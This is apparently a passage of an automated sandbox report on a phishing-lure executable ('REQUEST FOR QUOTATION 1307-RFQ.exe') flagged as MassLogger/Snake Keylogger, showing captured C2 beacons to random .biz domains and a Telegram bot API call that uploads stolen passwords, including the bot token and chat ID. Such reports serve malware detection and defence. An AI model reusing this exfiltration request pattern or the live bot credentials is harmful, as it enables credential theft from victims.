Dec 16, 2024 14:11:24.516927958 CET	850	OUT	Data Raw: 8f 37 a6 94 c9 1f 6a 14 46 03 00 00 30 87 bb ea 01 d9 17 c5 1a e1 a5 02 24 88 76 29 23 07 a0 74 42 3b a4 6d f9 ec c3 67 e8 9e c8 f2 f4 9c c1 69 7d 81 70 ef 92 94 30 46 73 08 0a db 75 13 f7 da 86 ce 72 d1 7b 50 9f ab 26 c3 83 ae 30 e0 65 e4 d9 96 Data Ascii: 7jF0$v)#tB;mgi}p0Fsur{P&0eYxJ:%'}nWd 2~p.:RUag$~F0"Kab]&}_h5~O.(bW{OZ-Jaf"TOR*_QYFHz84Y4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49816	82.112.184.197	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:11:46.556301117 CET	357	OUT	POST /tcmuebmfxhuj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:11:46.556301117 CET	850	OUT	Data Raw: cb bb a3 7a 38 64 1a f7 46 03 00 00 ac 98 f9 2e 70 a9 e8 cd ca 46 5f 08 c2 3e 1c 5c cb cb d6 68 01 cb cb cf 06 83 42 1a 39 01 ef 3b cc ed 75 ad f4 aa 93 c3 48 65 aa f0 05 cd 24 75 2f 5e 50 87 36 3e 50 a4 cf b2 bf cd aa 00 6c c2 6a c1 50 9f 27 cb Data Ascii: z8dF.pF_>\hB9;uHe$u/^P6>PljP's<cG$jh9pi[oZ\|Hdy}RJ#0"p(aBMO@4r(m(I!Zf$T(n/p9!_tmkN<`k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49867	47.129.31.212	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:12:09.139326096 CET	354	OUT	POST /jsoiayboaqe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:12:09.139336109 CET	850	OUT	Data Raw: 4a fb ea c8 23 5f 30 e0 46 03 00 00 5b 06 aa 09 11 2d 03 30 b4 5c 46 b0 5b 38 fa 23 82 74 38 67 27 23 38 e3 c0 92 61 b1 0f 27 8b e6 d4 60 ce d5 26 20 81 33 7b 34 d4 fb cf 31 02 b2 d4 24 e1 0d 24 39 e7 0f 6a 22 cb eb 80 35 67 60 ad f8 25 47 f6 67 Data Ascii: J#_0F[-0\F[8#t8g'#8a'`& 3{41$$9j"5g`%Gg~D";h IPy%'$.r;)}(K+mpbD6HRL;pYk>H@kQ33]6+f;h6/D1>bNWN?Z#2/"u!j=fmE?7
Dec 16, 2024 14:12:11.174906015 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:12:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ac524eaba069fbcb08dca07cef553fc7\|8.46.123.189\|1734354730\|1734354730\|0\|1\|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49873	13.251.16.150	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:12:11.927006006 CET	358	OUT	POST /mmbextsivoeuyvtt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:12:11.927031994 CET	850	OUT	Data Raw: 0f 59 cc 32 b3 45 bf 6b 46 03 00 00 75 7b 45 a2 7b 4b c2 f9 55 fd 86 e6 23 87 d4 0b dd 34 c6 04 ea 85 28 1f 71 50 eb b1 d2 ab 85 fb 32 9a 83 4b 1e 6e f3 fd dd ec 47 d5 22 55 af 89 48 5e 32 26 0c a8 91 05 bf 09 d2 5a 85 94 7d b5 03 35 12 cd ad fe Data Ascii: Y2EkFu{E{KU#4(qP2KnG"UH^2&Z}54g&EP9b_.TA~%=0 U)QEV~D:U`edE>:}4X\|)XTs{GDz-JhE]}v!
Dec 16, 2024 14:12:13.949496984 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:12:13 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=c0b64c0988310ef2069abe3ebedcde93\|8.46.123.189\|1734354733\|1734354733\|0\|1\|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49884	44.221.84.105	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:12:14.650361061 CET	355	OUT	POST /xoqfqirqhp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:12:14.650832891 CET	850	OUT	Data Raw: 3a 5f ee bd 91 3f e1 63 46 03 00 00 d0 f8 26 ca d5 e3 c3 71 d6 56 48 49 54 bd 8f 39 78 ab fa 73 38 4e 68 89 44 0e c2 4d 2c 90 7a 03 c6 e2 9d 57 bf 5e c1 25 df ee 44 46 31 5d f0 7b 3a c1 60 89 1a 1c 87 35 11 f2 c8 9c bb 2e f3 ca ca 98 ad bd 9e 09 Data Ascii: :_?cF&qVHIT9xs8NhDM,zW^%DF1]{:`5.q$Qj&QbaEs(sW{Z[oU>@~rcnovQjz!H\K_vE-pq!$tt)G^TFR>*cxF;=t,?H&
Dec 16, 2024 14:12:15.746413946 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:12:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=67623fea5fcea3de57622807835f06a0\|8.46.123.189\|1734354735\|1734354735\|0\|1\|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49890	18.141.10.107	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:12:16.686177969 CET	358	OUT	POST /kknpblsbxdrrjko HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:12:16.686197996 CET	850	OUT	Data Raw: 6e 44 5f 2a a6 0e ee ee 46 03 00 00 48 e1 0b e6 f1 eb 7b 06 61 68 40 9b ca 87 ff c9 c1 dd 41 7b 35 39 35 fa c8 61 6b e2 a2 fa 6a f2 f9 d5 65 9a 10 ae 56 54 7e d4 77 84 4a a3 54 68 44 56 00 76 14 e8 83 1c 8f 81 e5 e8 75 e7 4b 25 53 dd 3d ab bc 07 Data Ascii: nD_FH{ah@A{595akjeVT~wJThDVvuK%S=k,VZZkca#%T+Yu)HF!kUzD"C0+g:7@9zck7K\G6+2F`[;eGNG&JLK`_65<!gbZkSJsV
Dec 16, 2024 14:12:18.691659927 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 13:12:18 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=4e1dd1867094bd560cc0255fb6bacab1\|8.46.123.189\|1734354738\|1734354738\|0\|1\|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49896	172.234.222.143	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:12:19.347909927 CET	348	OUT	POST /wxalwqn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 16, 2024 14:12:19.347909927 CET	850	OUT	Data Raw: 67 9c 01 f5 22 30 36 c3 46 03 00 00 23 46 8c e7 fc fb ba 5f 70 fd e6 e4 a9 1d 2a db 2d 8d 2b b8 37 41 97 89 21 93 54 83 45 56 ec 8a 5e b0 17 c0 25 a6 5b 58 f5 0a e6 7c 1d 7f 4b 96 d0 b2 85 ae f7 7f e7 e4 38 04 b8 38 2d 79 2b b8 e4 75 a3 3c 7c 74 Data Ascii: g"06F#F_p*-+7A!TEV^%[X\|K88-y+u<\|t&m3QspQJm{8~}%fbqbgJjhfvaqDXhVLK'_Q/#G\|hB<D}VjO\|?p?w4$r_ngW:
Dec 16, 2024 14:12:20.488104105 CET	467	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Mon, 16 Dec 2024 13:12:20 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Accept-CH: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile Location: http://ww99.fwiwk.biz/wxalwqn Cache-Control: no-store, max-age=0 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49897	72.52.179.174	80	7316	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:12:20.837055922 CET	331	OUT	GET /wxalwqn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww99.fwiwk.biz
Dec 16, 2024 14:12:22.019236088 CET	278	IN	HTTP/1.1 302 Moved Temporarily Date: Mon, 16 Dec 2024 13:12:21 GMT Content-Type: text/html Content-Length: 0 Connection: keep-alive Location: http://ww7.fwiwk.biz/wxalwqn?usid=25&utid=8251818455 Cache-Control: no-cache Pragma: no-cache Access-Control-Allow-Origin: *

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	172.67.177.134	443	7360	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:10:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:10:22 UTC	876	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:10:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 343391 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=555BreKNVGt8IhJa1MbO%2BG8XcfTOpHAci2oNeQB%2B3X1m098S3x5mLNbf23Dc5ErY7BYMV4q4Dy85c2j5fFfq1Ac59jY6KJtaraVhT7NoE4%2B3kcaYcJ0z60g3nuthJBjLZ2kHkgkp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2ee9c46c714288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1679&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1674311&cwnd=245&unsent_bytes=0&cid=4b6d94867e78735a&ts=486&x=0"
2024-12-16 13:10:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	149.154.167.220	443	7360	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:10:29 UTC	295	OUT	POST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1da91996ff1a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-16 13:10:29 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 64 61 39 31 39 39 36 66 66 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1da91996ff1aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-16 13:10:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:10:30 GMT Content-Type: application/json Content-Length: 556 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:10:30 UTC	556	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 36 34 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 30 38 36 36 32 37 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 6e 6f 76 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 39 38 32 39 34 37 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6b 77 61 6e 64 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 67 34 6d 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 36 33 30 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":16447,"from":{"id":7708662779,"is_bot":true,"first_name":"NOVA","username":"Skullsnovabot"},"chat":{"id":5839829477,"first_name":"Makwanda","last_name":"Skulls","username":"Big4m","type":"private"},"date":1734354630,"docu

Target ID:	0
Start time:	08:10:15
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
Imagebase:	0x400000
File size:	1'553'920 bytes
MD5 hash:	821AEC135EA3AA8E02FAB9D0CC783A0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1686867266.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Target ID:	1
Start time:	08:10:16
Start date:	16/12/2024
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'396'736 bytes
MD5 hash:	56CC9A6FF09CF87495300EA7EEC67B33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	08:10:16
Start date:	16/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"
Imagebase:	0x7b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2961862883.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2917315050.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2961862883.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	08:10:16
Start date:	16/12/2024
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'332'224 bytes
MD5 hash:	81093F4AEBE45D63048591DC7BC8A814
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	6
Start time:	08:10:19
Start date:	16/12/2024
Path:	C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\fxssvc.exe
Imagebase:	0x140000000
File size:	1'242'624 bytes
MD5 hash:	1B98ADE6B240EAC1ED51A8847FC157EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	08:10:20
Start date:	16/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	422656A98AE1E4FC0F42676F7870266C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	8
Start time:	08:10:21
Start date:	16/12/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x1a0000
File size:	1'463'296 bytes
MD5 hash:	E78B9CA154BB75A39A7016C4054776F9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	9
Start time:	08:10:22
Start date:	16/12/2024
Path:	C:\Windows\System32\msdtc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\msdtc.exe
Imagebase:	0x140000000
File size:	1'384'960 bytes
MD5 hash:	84AD1165D1CC1C542C535B1CFAB6AD15
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	10
Start time:	08:10:23
Start date:	16/12/2024
Path:	C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase:	0x140000000
File size:	1'342'464 bytes
MD5 hash:	5A764611EA22446F05BB79BB3366106F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	11
Start time:	08:10:24
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\perfhost.exe
Imagebase:	0x400000
File size:	1'257'472 bytes
MD5 hash:	95B91FACFA2553E088397F5D45544CBA
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	12
Start time:	08:10:25
Start date:	16/12/2024
Path:	C:\Windows\System32\Locator.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\locator.exe
Imagebase:	0x140000000
File size:	1'247'744 bytes
MD5 hash:	1A71445017EDEBF6811D579BE5438F3B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	13
Start time:	08:10:26
Start date:	16/12/2024
Path:	C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\SensorDataService.exe
Imagebase:	0x140000000
File size:	1'846'784 bytes
MD5 hash:	FEE7BE523832A1DAA28153EE09159969
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	14
Start time:	08:10:27
Start date:	16/12/2024
Path:	C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\snmptrap.exe
Imagebase:	0x140000000
File size:	1'253'376 bytes
MD5 hash:	D48C35119955A40BE97FC32494D6DEB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	15
Start time:	08:10:28
Start date:	16/12/2024
Path:	C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\spectrum.exe
Imagebase:	0x140000000
File size:	1'455'616 bytes
MD5 hash:	FC42F22F248DDF97255574928099BD4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	17
Start time:	08:10:29
Start date:	16/12/2024
Path:	C:\Windows\System32\OpenSSH\ssh-agent.exe
Wow64 process (32bit):	false
